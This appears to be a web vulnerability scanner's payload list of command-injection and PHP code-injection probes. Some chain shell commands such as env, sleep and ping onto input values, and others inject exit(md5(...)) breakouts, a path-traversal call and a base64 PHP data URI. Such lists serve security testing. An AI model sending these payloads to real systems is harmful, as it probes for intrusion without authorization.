;env;
a;env;
a);env;
../../../../../../../../../../../../../../../usr/bin/env|
[VALUE];env;
[VALUE][LF]env;
&set&
/e\0
a;exit(md5('w4p1t1_md5'));//
a;exit(md5('w4p1t1_md5'));#
";exit(md5('w4p1t1_md5'));//
";exit(md5('w4p1t1_md5'));#
';exit(md5('w4p1t1_md5'));//
';exit(md5('w4p1t1_md5'));#
".exit(md5('w4p1t1_md5'));//
".exit(md5('w4p1t1_md5'));#
'.exit(md5('w4p1t1_md5'));//
'.exit(md5('w4p1t1_md5'));#
;exit(md5('w4p1t1_md5'));//
;exit(md5('w4p1t1_md5'));#
data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==
a`)`
a`sleep 60`[TIMEOUT]
a;sleep 60;[TIMEOUT]
a|sleep 60;[TIMEOUT]
&ping -n 25 127.0.0.1&[TIMEOUT]